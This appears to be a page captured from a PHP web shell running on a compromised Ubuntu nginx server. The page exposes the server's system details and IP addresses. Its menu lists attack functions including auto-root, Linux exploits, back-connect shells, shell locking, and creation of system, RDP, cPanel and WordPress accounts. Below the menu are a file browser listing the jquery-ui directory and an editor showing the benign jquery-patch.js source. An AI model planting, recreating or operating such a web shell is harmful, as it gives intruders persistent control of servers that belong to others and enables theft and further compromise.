Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
javascript /
jquery-ui /
ui /
[ HOME SHELL ]
Name
Size
Permission
Action
effects
[ DIR ]
drwxr-xr-x
i18n
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
core.js
361
B
-rw-r--r--
core.min.js
257
B
-rw-r--r--
data.js
934
B
-rw-r--r--
data.min.js
360
B
-rw-r--r--
disable-selection.js
1.05
KB
-rw-r--r--
disable-selection.min.js
461
B
-rw-r--r--
effect.js
24.04
KB
-rw-r--r--
effect.min.js
13.71
KB
-rw-r--r--
focusable.js
2.24
KB
-rw-r--r--
focusable.min.js
1.08
KB
-rw-r--r--
form-reset-mixin.js
1.78
KB
-rw-r--r--
form-reset-mixin.min.js
959
B
-rw-r--r--
form.js
581
B
-rw-r--r--
form.min.js
256
B
-rw-r--r--
ie.js
385
B
-rw-r--r--
ie.min.js
224
B
-rw-r--r--
jquery-patch.js
2.12
KB
-rw-r--r--
jquery-patch.min.js
725
B
-rw-r--r--
jquery-var-for-color.js
530
B
-rw-r--r--
jquery-var-for-color.min.js
141
B
-rw-r--r--
keycode.js
820
B
-rw-r--r--
keycode.min.js
322
B
-rw-r--r--
labels.js
1.73
KB
-rw-r--r--
labels.min.js
586
B
-rw-r--r--
plugin.js
1020
B
-rw-r--r--
plugin.min.js
617
B
-rw-r--r--
position.js
14.77
KB
-rw-r--r--
position.min.js
9.47
KB
-rw-r--r--
safe-active-element.js
1014
B
-rw-r--r--
safe-active-element.min.js
406
B
-rw-r--r--
safe-blur.js
523
B
-rw-r--r--
safe-blur.min.js
270
B
-rw-r--r--
scroll-parent.js
1.25
KB
-rw-r--r--
scroll-parent.min.js
674
B
-rw-r--r--
tabbable.js
883
B
-rw-r--r--
tabbable.min.js
367
B
-rw-r--r--
unique-id.js
976
B
-rw-r--r--
unique-id.min.js
391
B
-rw-r--r--
version.js
322
B
-rw-r--r--
version.min.js
184
B
-rw-r--r--
widget.js
19.81
KB
-rw-r--r--
widget.min.js
11.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery-patch.js
/*! * jQuery UI Support for jQuery core 1.8.x and newer 1.13.1 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license * */ //>>label: jQuery 1.8+ Support //>>group: Core //>>description: Support version 1.8.x and newer of jQuery core ( function( factory ) { "use strict"; if ( typeof define === "function" && define.amd ) { // AMD. Register as an anonymous module. define( [ "jquery", "./version" ], factory ); } else { // Browser globals factory( jQuery ); } } )( function( $ ) { "use strict"; // Support: jQuery 1.9.x or older // $.expr[ ":" ] is deprecated. if ( !$.expr.pseudos ) { $.expr.pseudos = $.expr[ ":" ]; } // Support: jQuery 1.11.x or older // $.unique has been renamed to $.uniqueSort if ( !$.uniqueSort ) { $.uniqueSort = $.unique; } // Support: jQuery 2.2.x or older. // This method has been defined in jQuery 3.0.0. // Code from https://github.com/jquery/jquery/blob/e539bac79e666bba95bba86d690b4e609dca2286/src/selector/escapeSelector.js if ( !$.escapeSelector ) { // CSS string/identifier serialization // https://drafts.csswg.org/cssom/#common-serializing-idioms var rcssescape = /([\0-\x1f\x7f]|^-?\d)|^-$|[^\x80-\uFFFF\w-]/g; var fcssescape = function( ch, asCodePoint ) { if ( asCodePoint ) { // U+0000 NULL becomes U+FFFD REPLACEMENT CHARACTER if ( ch === "\0" ) { return "\uFFFD"; } // Control characters and (dependent upon position) numbers get escaped as code points return ch.slice( 0, -1 ) + "\\" + ch.charCodeAt( ch.length - 1 ).toString( 16 ) + " "; } // Other potentially-special ASCII characters get backslash-escaped return "\\" + ch; }; $.escapeSelector = function( sel ) { return ( sel + "" ).replace( rcssescape, fcssescape ); }; } // Support: jQuery 3.4.x or older // These methods have been defined in jQuery 3.5.0. if ( !$.fn.even || !$.fn.odd ) { $.fn.extend( { even: function() { return this.filter( function( i ) { return i % 2 === 0; } ); }, odd: function() { return this.filter( function( i ) { return i % 2 === 1; } ); } } ); } } );
Close